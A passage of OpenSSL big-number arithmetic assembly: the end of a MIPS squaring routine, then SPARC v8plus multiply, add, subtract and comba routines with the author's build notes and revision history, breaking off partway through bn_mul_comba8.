dmultu a_1,a_1 /* mul_add_c(a[1],b[1],c3,c1,c2); */
mflo t_1
mfhi t_2
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,16(a0)
dmultu a_0,a_3 /* mul_add_c2(a[0],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
slt c_3,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
dmultu a_1,a_2 /* mul_add_c(a2[1],b[2],c1,c2,c3); */
mflo t_1
mfhi t_2
slt AT,t_2,zero
daddu c_3,AT
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sltu AT,c_2,t_2
daddu c_3,AT
sd c_1,24(a0)
dmultu a_3,a_1 /* mul_add_c2(a[3],b[1],c2,c3,c1); */
mflo t_1
mfhi t_2
slt c_1,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
dmultu a_2,a_2 /* mul_add_c(a[2],b[2],c2,c3,c1); */
mflo t_1
mfhi t_2
daddu c_2,t_1
sltu AT,c_2,t_1
daddu t_2,AT
daddu c_3,t_2
sltu AT,c_3,t_2
daddu c_1,AT
sd c_2,32(a0)
dmultu a_2,a_3 /* mul_add_c2(a[2],b[3],c3,c1,c2); */
mflo t_1
mfhi t_2
slt c_2,t_2,zero
dsll t_2,1
slt a2,t_1,zero
daddu t_2,a2
dsll t_1,1
daddu c_3,t_1
sltu AT,c_3,t_1
daddu t_2,AT
daddu c_1,t_2
sltu AT,c_1,t_2
daddu c_2,AT
sd c_3,40(a0)
dmultu a_3,a_3 /* mul_add_c(a[3],b[3],c1,c2,c3); */
mflo t_1
mfhi t_2
daddu c_1,t_1
sltu AT,c_1,t_1
daddu t_2,AT
daddu c_2,t_2
sd c_1,48(a0)
sd c_2,56(a0)
jr ra
END(bn_sqr_comba4)
|
AIFM-sys/AIFM
| 32,783
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/sparcv8plus.S
|
.ident "sparcv8plus.s, Version 1.4"
.ident "SPARC v9 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
/*
* ====================================================================
* Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
* project.
*
* Rights for redistribution and usage in source and binary forms are
* granted according to the OpenSSL license. Warranty of any kind is
* disclaimed.
* ====================================================================
*/
/*
* This is my modest contributon to OpenSSL project (see
* http://www.openssl.org/ for more information about it) and is
* a drop-in UltraSPARC ISA replacement for crypto/bn/bn_asm.c
* module. For updates see http://fy.chalmers.se/~appro/hpe/.
*
* Questions-n-answers.
*
* Q. How to compile?
* A. With SC4.x/SC5.x:
*
* cc -xarch=v8plus -c bn_asm.sparc.v8plus.S -o bn_asm.o
*
* and with gcc:
*
* gcc -mcpu=ultrasparc -c bn_asm.sparc.v8plus.S -o bn_asm.o
*
* or if above fails (it does if you have gas installed):
*
* gcc -E bn_asm.sparc.v8plus.S | as -xarch=v8plus /dev/fd/0 -o bn_asm.o
*
* Quick-n-dirty way to fuse the module into the library.
* Provided that the library is already configured and built
* (in 0.9.2 case with no-asm option):
*
* # cd crypto/bn
* # cp /some/place/bn_asm.sparc.v8plus.S .
* # cc -xarch=v8plus -c bn_asm.sparc.v8plus.S -o bn_asm.o
* # make
* # cd ../..
* # make; make test
*
* Quick-n-dirty way to get rid of it:
*
* # cd crypto/bn
* # touch bn_asm.c
* # make
* # cd ../..
* # make; make test
*
* Q. V8plus achitecture? What kind of beast is that?
* A. Well, it's rather a programming model than an architecture...
* It's actually v9-compliant, i.e. *any* UltraSPARC, CPU under
* special conditions, namely when kernel doesn't preserve upper
* 32 bits of otherwise 64-bit registers during a context switch.
*
* Q. Why just UltraSPARC? What about SuperSPARC?
* A. Original release did target UltraSPARC only. Now SuperSPARC
* version is provided along. Both version share bn_*comba[48]
* implementations (see comment later in code for explanation).
* But what's so special about this UltraSPARC implementation?
* Why didn't I let compiler do the job? Trouble is that most of
* available compilers (well, SC5.0 is the only exception) don't
* attempt to take advantage of UltraSPARC's 64-bitness under
* 32-bit kernels even though it's perfectly possible (see next
* question).
*
* Q. 64-bit registers under 32-bit kernels? Didn't you just say it
* doesn't work?
* A. You can't adress *all* registers as 64-bit wide:-( The catch is
* that you actually may rely upon %o0-%o5 and %g1-%g4 being fully
* preserved if you're in a leaf function, i.e. such never calling
* any other functions. All functions in this module are leaf and
* 10 registers is a handful. And as a matter of fact none-"comba"
* routines don't require even that much and I could even afford to
* not allocate own stack frame for 'em:-)
*
* Q. What about 64-bit kernels?
* A. What about 'em? Just kidding:-) Pure 64-bit version is currently
* under evaluation and development...
*
* Q. What about shared libraries?
* A. What about 'em? Kidding again:-) Code does *not* contain any
* code position dependencies and it's safe to include it into
* shared library as is.
*
* Q. How much faster does it go?
* A. Do you have a good benchmark? In either case below is what I
* experience with crypto/bn/expspeed.c test program:
*
* v8plus module on U10/300MHz against bn_asm.c compiled with:
*
* cc-5.0 -xarch=v8plus -xO5 -xdepend +7-12%
* cc-4.2 -xarch=v8plus -xO5 -xdepend +25-35%
* egcs-1.1.2 -mcpu=ultrasparc -O3 +35-45%
*
* v8 module on SS10/60MHz against bn_asm.c compiled with:
*
* cc-5.0 -xarch=v8 -xO5 -xdepend +7-10%
* cc-4.2 -xarch=v8 -xO5 -xdepend +10%
* egcs-1.1.2 -mv8 -O3 +35-45%
*
* As you can see it's damn hard to beat the new Sun C compiler
* and it's in first place GNU C users who will appreciate this
* assembler implementation:-)
*/
/*
* Revision history.
*
* 1.0 - initial release;
* 1.1 - new loop unrolling model(*);
* - some more fine tuning;
* 1.2 - made gas friendly;
* - updates to documentation concerning v9;
* - new performance comparison matrix;
* 1.3 - fixed problem with /usr/ccs/lib/cpp;
* 1.4 - native V9 bn_*_comba[48] implementation (15% more efficient)
* resulting in slight overall performance kick;
* - some retunes;
* - support for GNU as added;
*
* (*) Originally unrolled loop looked like this:
* for (;;) {
* op(p+0); if (--n==0) break;
* op(p+1); if (--n==0) break;
* op(p+2); if (--n==0) break;
* op(p+3); if (--n==0) break;
* p+=4;
* }
* I unroll according to following:
* while (n&~3) {
* op(p+0); op(p+1); op(p+2); op(p+3);
* p+=4; n=-4;
* }
* if (n) {
* op(p+0); if (--n==0) return;
* op(p+2); if (--n==0) return;
* op(p+3); return;
* }
*/
/*
* GNU assembler can't stand stuw:-(
*/
#define stuw st
.section ".text",#alloc,#execinstr
.file "bn_asm.sparc.v8plus.S"
.align 32
.global bn_mul_add_words
/*
* BN_ULONG bn_mul_add_words(rp,ap,num,w)
* BN_ULONG *rp,*ap;
* int num;
* BN_ULONG w;
*/
bn_mul_add_words:
sra %o2,%g0,%o2 ! signx %o2
brgz,a %o2,.L_bn_mul_add_words_proceed
lduw [%o1],%g2
retl
clr %o0
nop
nop
nop
.L_bn_mul_add_words_proceed:
srl %o3,%g0,%o3 ! clruw %o3
andcc %o2,-4,%g0
bz,pn %icc,.L_bn_mul_add_words_tail
clr %o5
.L_bn_mul_add_words_loop: ! wow! 32 aligned!
lduw [%o0],%g1
lduw [%o1+4],%g3
mulx %o3,%g2,%g2
add %g1,%o5,%o4
nop
add %o4,%g2,%o4
stuw %o4,[%o0]
srlx %o4,32,%o5
lduw [%o0+4],%g1
lduw [%o1+8],%g2
mulx %o3,%g3,%g3
add %g1,%o5,%o4
dec 4,%o2
add %o4,%g3,%o4
stuw %o4,[%o0+4]
srlx %o4,32,%o5
lduw [%o0+8],%g1
lduw [%o1+12],%g3
mulx %o3,%g2,%g2
add %g1,%o5,%o4
inc 16,%o1
add %o4,%g2,%o4
stuw %o4,[%o0+8]
srlx %o4,32,%o5
lduw [%o0+12],%g1
mulx %o3,%g3,%g3
add %g1,%o5,%o4
inc 16,%o0
add %o4,%g3,%o4
andcc %o2,-4,%g0
stuw %o4,[%o0-4]
srlx %o4,32,%o5
bnz,a,pt %icc,.L_bn_mul_add_words_loop
lduw [%o1],%g2
brnz,a,pn %o2,.L_bn_mul_add_words_tail
lduw [%o1],%g2
.L_bn_mul_add_words_return:
retl
mov %o5,%o0
.L_bn_mul_add_words_tail:
lduw [%o0],%g1
mulx %o3,%g2,%g2
add %g1,%o5,%o4
dec %o2
add %o4,%g2,%o4
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_add_words_return
stuw %o4,[%o0]
lduw [%o1+4],%g2
lduw [%o0+4],%g1
mulx %o3,%g2,%g2
add %g1,%o5,%o4
dec %o2
add %o4,%g2,%o4
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_add_words_return
stuw %o4,[%o0+4]
lduw [%o1+8],%g2
lduw [%o0+8],%g1
mulx %o3,%g2,%g2
add %g1,%o5,%o4
add %o4,%g2,%o4
stuw %o4,[%o0+8]
retl
srlx %o4,32,%o0
.type bn_mul_add_words,#function
.size bn_mul_add_words,(.-bn_mul_add_words)
.align 32
.global bn_mul_words
/*
* BN_ULONG bn_mul_words(rp,ap,num,w)
* BN_ULONG *rp,*ap;
* int num;
* BN_ULONG w;
*/
bn_mul_words:
sra %o2,%g0,%o2 ! signx %o2
brgz,a %o2,.L_bn_mul_words_proceeed
lduw [%o1],%g2
retl
clr %o0
nop
nop
nop
.L_bn_mul_words_proceeed:
srl %o3,%g0,%o3 ! clruw %o3
andcc %o2,-4,%g0
bz,pn %icc,.L_bn_mul_words_tail
clr %o5
.L_bn_mul_words_loop: ! wow! 32 aligned!
lduw [%o1+4],%g3
mulx %o3,%g2,%g2
add %g2,%o5,%o4
nop
stuw %o4,[%o0]
srlx %o4,32,%o5
lduw [%o1+8],%g2
mulx %o3,%g3,%g3
add %g3,%o5,%o4
dec 4,%o2
stuw %o4,[%o0+4]
srlx %o4,32,%o5
lduw [%o1+12],%g3
mulx %o3,%g2,%g2
add %g2,%o5,%o4
inc 16,%o1
stuw %o4,[%o0+8]
srlx %o4,32,%o5
mulx %o3,%g3,%g3
add %g3,%o5,%o4
inc 16,%o0
stuw %o4,[%o0-4]
srlx %o4,32,%o5
andcc %o2,-4,%g0
bnz,a,pt %icc,.L_bn_mul_words_loop
lduw [%o1],%g2
nop
nop
brnz,a,pn %o2,.L_bn_mul_words_tail
lduw [%o1],%g2
.L_bn_mul_words_return:
retl
mov %o5,%o0
.L_bn_mul_words_tail:
mulx %o3,%g2,%g2
add %g2,%o5,%o4
dec %o2
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_words_return
stuw %o4,[%o0]
lduw [%o1+4],%g2
mulx %o3,%g2,%g2
add %g2,%o5,%o4
dec %o2
srlx %o4,32,%o5
brz,pt %o2,.L_bn_mul_words_return
stuw %o4,[%o0+4]
lduw [%o1+8],%g2
mulx %o3,%g2,%g2
add %g2,%o5,%o4
stuw %o4,[%o0+8]
retl
srlx %o4,32,%o0
.type bn_mul_words,#function
.size bn_mul_words,(.-bn_mul_words)
.align 32
.global bn_sqr_words
/*
* void bn_sqr_words(r,a,n)
* BN_ULONG *r,*a;
* int n;
*/
bn_sqr_words:
sra %o2,%g0,%o2 ! signx %o2
brgz,a %o2,.L_bn_sqr_words_proceeed
lduw [%o1],%g2
retl
clr %o0
nop
nop
nop
.L_bn_sqr_words_proceeed:
andcc %o2,-4,%g0
nop
bz,pn %icc,.L_bn_sqr_words_tail
nop
.L_bn_sqr_words_loop: ! wow! 32 aligned!
lduw [%o1+4],%g3
mulx %g2,%g2,%o4
stuw %o4,[%o0]
srlx %o4,32,%o5
stuw %o5,[%o0+4]
nop
lduw [%o1+8],%g2
mulx %g3,%g3,%o4
dec 4,%o2
stuw %o4,[%o0+8]
srlx %o4,32,%o5
stuw %o5,[%o0+12]
lduw [%o1+12],%g3
mulx %g2,%g2,%o4
srlx %o4,32,%o5
stuw %o4,[%o0+16]
inc 16,%o1
stuw %o5,[%o0+20]
mulx %g3,%g3,%o4
inc 32,%o0
stuw %o4,[%o0-8]
srlx %o4,32,%o5
andcc %o2,-4,%g2
stuw %o5,[%o0-4]
bnz,a,pt %icc,.L_bn_sqr_words_loop
lduw [%o1],%g2
nop
brnz,a,pn %o2,.L_bn_sqr_words_tail
lduw [%o1],%g2
.L_bn_sqr_words_return:
retl
clr %o0
.L_bn_sqr_words_tail:
mulx %g2,%g2,%o4
dec %o2
stuw %o4,[%o0]
srlx %o4,32,%o5
brz,pt %o2,.L_bn_sqr_words_return
stuw %o5,[%o0+4]
lduw [%o1+4],%g2
mulx %g2,%g2,%o4
dec %o2
stuw %o4,[%o0+8]
srlx %o4,32,%o5
brz,pt %o2,.L_bn_sqr_words_return
stuw %o5,[%o0+12]
lduw [%o1+8],%g2
mulx %g2,%g2,%o4
srlx %o4,32,%o5
stuw %o4,[%o0+16]
stuw %o5,[%o0+20]
retl
clr %o0
.type bn_sqr_words,#function
.size bn_sqr_words,(.-bn_sqr_words)
.align 32
.global bn_div_words
/*
* BN_ULONG bn_div_words(h,l,d)
* BN_ULONG h,l,d;
*/
bn_div_words:
sllx %o0,32,%o0
or %o0,%o1,%o0
udivx %o0,%o2,%o0
retl
srl %o0,%g0,%o0 ! clruw %o0
.type bn_div_words,#function
.size bn_div_words,(.-bn_div_words)
.align 32
.global bn_add_words
/*
* BN_ULONG bn_add_words(rp,ap,bp,n)
* BN_ULONG *rp,*ap,*bp;
* int n;
*/
bn_add_words:
sra %o3,%g0,%o3 ! signx %o3
brgz,a %o3,.L_bn_add_words_proceed
lduw [%o1],%o4
retl
clr %o0
.L_bn_add_words_proceed:
andcc %o3,-4,%g0
bz,pn %icc,.L_bn_add_words_tail
addcc %g0,0,%g0 ! clear carry flag
.L_bn_add_words_loop: ! wow! 32 aligned!
dec 4,%o3
lduw [%o2],%o5
lduw [%o1+4],%g1
lduw [%o2+4],%g2
lduw [%o1+8],%g3
lduw [%o2+8],%g4
addccc %o5,%o4,%o5
stuw %o5,[%o0]
lduw [%o1+12],%o4
lduw [%o2+12],%o5
inc 16,%o1
addccc %g1,%g2,%g1
stuw %g1,[%o0+4]
inc 16,%o2
addccc %g3,%g4,%g3
stuw %g3,[%o0+8]
inc 16,%o0
addccc %o5,%o4,%o5
stuw %o5,[%o0-4]
and %o3,-4,%g1
brnz,a,pt %g1,.L_bn_add_words_loop
lduw [%o1],%o4
brnz,a,pn %o3,.L_bn_add_words_tail
lduw [%o1],%o4
.L_bn_add_words_return:
clr %o0
retl
movcs %icc,1,%o0
nop
.L_bn_add_words_tail:
lduw [%o2],%o5
dec %o3
addccc %o5,%o4,%o5
brz,pt %o3,.L_bn_add_words_return
stuw %o5,[%o0]
lduw [%o1+4],%o4
lduw [%o2+4],%o5
dec %o3
addccc %o5,%o4,%o5
brz,pt %o3,.L_bn_add_words_return
stuw %o5,[%o0+4]
lduw [%o1+8],%o4
lduw [%o2+8],%o5
addccc %o5,%o4,%o5
stuw %o5,[%o0+8]
clr %o0
retl
movcs %icc,1,%o0
.type bn_add_words,#function
.size bn_add_words,(.-bn_add_words)
.global bn_sub_words
/*
* BN_ULONG bn_sub_words(rp,ap,bp,n)
* BN_ULONG *rp,*ap,*bp;
* int n;
*/
bn_sub_words:
sra %o3,%g0,%o3 ! signx %o3
brgz,a %o3,.L_bn_sub_words_proceed
lduw [%o1],%o4
retl
clr %o0
.L_bn_sub_words_proceed:
andcc %o3,-4,%g0
bz,pn %icc,.L_bn_sub_words_tail
addcc %g0,0,%g0 ! clear carry flag
.L_bn_sub_words_loop: ! wow! 32 aligned!
dec 4,%o3
lduw [%o2],%o5
lduw [%o1+4],%g1
lduw [%o2+4],%g2
lduw [%o1+8],%g3
lduw [%o2+8],%g4
subccc %o4,%o5,%o5
stuw %o5,[%o0]
lduw [%o1+12],%o4
lduw [%o2+12],%o5
inc 16,%o1
subccc %g1,%g2,%g2
stuw %g2,[%o0+4]
inc 16,%o2
subccc %g3,%g4,%g4
stuw %g4,[%o0+8]
inc 16,%o0
subccc %o4,%o5,%o5
stuw %o5,[%o0-4]
and %o3,-4,%g1
brnz,a,pt %g1,.L_bn_sub_words_loop
lduw [%o1],%o4
brnz,a,pn %o3,.L_bn_sub_words_tail
lduw [%o1],%o4
.L_bn_sub_words_return:
clr %o0
retl
movcs %icc,1,%o0
nop
.L_bn_sub_words_tail: ! wow! 32 aligned!
lduw [%o2],%o5
dec %o3
subccc %o4,%o5,%o5
brz,pt %o3,.L_bn_sub_words_return
stuw %o5,[%o0]
lduw [%o1+4],%o4
lduw [%o2+4],%o5
dec %o3
subccc %o4,%o5,%o5
brz,pt %o3,.L_bn_sub_words_return
stuw %o5,[%o0+4]
lduw [%o1+8],%o4
lduw [%o2+8],%o5
subccc %o4,%o5,%o5
stuw %o5,[%o0+8]
clr %o0
retl
movcs %icc,1,%o0
.type bn_sub_words,#function
.size bn_sub_words,(.-bn_sub_words)
/*
* Code below depends on the fact that upper parts of the %l0-%l7
* and %i0-%i7 are zeroed by kernel after context switch. In
* previous versions this comment stated that "the trouble is that
* it's not feasible to implement the mumbo-jumbo in less V9
* instructions:-(" which apparently isn't true thanks to
* 'bcs,a %xcc,.+8; inc %rd' pair. But the performance improvement
* results not from the shorter code, but from elimination of
* multicycle none-pairable 'rd %y,%rd' instructions.
*
* Andy.
*/
#define FRAME_SIZE -96
/*
* Here is register usage map for *all* routines below.
*/
#define t_1 %o0
#define t_2 %o1
#define c_12 %o2
#define c_3 %o3
#define ap(I) [%i1+4*I]
#define bp(I) [%i2+4*I]
#define rp(I) [%i0+4*I]
#define a_0 %l0
#define a_1 %l1
#define a_2 %l2
#define a_3 %l3
#define a_4 %l4
#define a_5 %l5
#define a_6 %l6
#define a_7 %l7
#define b_0 %i3
#define b_1 %i4
#define b_2 %i5
#define b_3 %o4
#define b_4 %o5
#define b_5 %o7
#define b_6 %g1
#define b_7 %g4
.align 32
.global bn_mul_comba8
/*
* void bn_mul_comba8(r,a,b)
* BN_ULONG *r,*a,*b;
*/
bn_mul_comba8:
save %sp,FRAME_SIZE,%sp
mov 1,t_2
lduw ap(0),a_0
sllx t_2,32,t_2
lduw bp(0),b_0 !=
lduw bp(1),b_1
mulx a_0,b_0,t_1 !mul_add_c(a[0],b[0],c1,c2,c3);
srlx t_1,32,c_12
stuw t_1,rp(0) !=!r[0]=c1;
lduw ap(1),a_1
mulx a_0,b_1,t_1 !mul_add_c(a[0],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(2),a_2
mulx a_1,b_0,t_1 !=!mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(1) !r[1]=c2;
or c_12,c_3,c_12
mulx a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(2),b_2 !=
mulx a_1,b_1,t_1 !mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(3),b_3
mulx a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(2) !r[2]=c3;
or c_12,c_3,c_12 !=
mulx a_0,b_3,t_1 !mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_2,t_1 !=!mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(3),a_3
mulx a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(4),a_4
mulx a_3,b_0,t_1 !=!mul_add_c(a[3],b[0],c1,c2,c3);!=
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(3) !r[3]=c1;
or c_12,c_3,c_12
mulx a_4,b_0,t_1 !mul_add_c(a[4],b[0],c2,c3,c1);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_1,t_1 !=!mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,b_2,t_1 !=!mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(4),b_4 !=
mulx a_1,b_3,t_1 !mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(5),b_5
mulx a_0,b_4,t_1 !mul_add_c(a[0],b[4],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(4) !r[4]=c2;
or c_12,c_3,c_12 !=
mulx a_0,b_5,t_1 !mul_add_c(a[0],b[5],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_4,t_1 !mul_add_c(a[1],b[4],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_2,b_3,t_1 !mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(5),a_5
mulx a_4,b_1,t_1 !mul_add_c(a[4],b[1],c3,c1,c2);
addcc c_12,t_1,c_12 !=
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw ap(6),a_6
mulx a_5,b_0,t_1 !=!mul_add_c(a[5],b[0],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(5) !r[5]=c3;
or c_12,c_3,c_12
mulx a_6,b_0,t_1 !mul_add_c(a[6],b[0],c1,c2,c3);
addcc c_12,t_1,c_12 !=
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_5,b_1,t_1 !=!mul_add_c(a[5],b[1],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_4,b_2,t_1 !=!mul_add_c(a[4],b[2],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_3,b_3,t_1 !=!mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_2,b_4,t_1 !=!mul_add_c(a[2],b[4],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
lduw bp(6),b_6 !=
mulx a_1,b_5,t_1 !mul_add_c(a[1],b[5],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
lduw bp(7),b_7
mulx a_0,b_6,t_1 !mul_add_c(a[0],b[6],c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(6) !r[6]=c1;
or c_12,c_3,c_12 !=
mulx a_0,b_7,t_1 !mul_add_c(a[0],b[7],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_1,b_6,t_1 !mul_add_c(a[1],b[6],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_2,b_5,t_1 !mul_add_c(a[2],b[5],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_3,b_4,t_1 !mul_add_c(a[3],b[4],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_4,b_3,t_1 !mul_add_c(a[4],b[3],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_2,t_1 !mul_add_c(a[5],b[2],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
lduw ap(7),a_7
mulx a_6,b_1,t_1 !=!mul_add_c(a[6],b[1],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3
mulx a_7,b_0,t_1 !=!mul_add_c(a[7],b[0],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3
srlx t_1,32,c_12 !=
stuw t_1,rp(7) !r[7]=c2;
or c_12,c_3,c_12
mulx a_7,b_1,t_1 !=!mul_add_c(a[7],b[1],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_6,b_2,t_1 !mul_add_c(a[6],b[2],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_5,b_3,t_1 !mul_add_c(a[5],b[3],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_4,b_4,t_1 !mul_add_c(a[4],b[4],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_3,b_5,t_1 !mul_add_c(a[3],b[5],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_2,b_6,t_1 !mul_add_c(a[2],b[6],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_1,b_7,t_1 !mul_add_c(a[1],b[7],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
srlx t_1,32,c_12
stuw t_1,rp(8) !r[8]=c3;
or c_12,c_3,c_12
mulx a_2,b_7,t_1 !=!mul_add_c(a[2],b[7],c1,c2,c3);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8
add c_3,t_2,c_3 !=
mulx a_3,b_6,t_1 !mul_add_c(a[3],b[6],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_4,b_5,t_1 !mul_add_c(a[4],b[5],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_4,t_1 !mul_add_c(a[5],b[4],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_3,t_1 !mul_add_c(a[6],b[3],c1,c2,c3);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_7,b_2,t_1 !mul_add_c(a[7],b[2],c1,c2,c3);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(9) !r[9]=c1;
or c_12,c_3,c_12 !=
mulx a_7,b_3,t_1 !mul_add_c(a[7],b[3],c2,c3,c1);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_4,t_1 !mul_add_c(a[6],b[4],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_5,t_1 !mul_add_c(a[5],b[5],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_4,b_6,t_1 !mul_add_c(a[4],b[6],c2,c3,c1);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_3,b_7,t_1 !mul_add_c(a[3],b[7],c2,c3,c1);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
srlx t_1,32,c_12
stuw t_1,rp(10) !r[10]=c2;
or c_12,c_3,c_12 !=
mulx a_4,b_7,t_1 !mul_add_c(a[4],b[7],c3,c1,c2);
addcc c_12,t_1,c_12
clr c_3
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_5,b_6,t_1 !mul_add_c(a[5],b[6],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_6,b_5,t_1 !mul_add_c(a[6],b[5],c3,c1,c2);
addcc c_12,t_1,c_12
bcs,a %xcc,.+8 !=
add c_3,t_2,c_3
mulx a_7,b_4,t_1 !mul_add_c(a[7],b[4],c3,c1,c2);
addcc c_12,t_1,t_1
bcs,a %xcc,.+8 !=
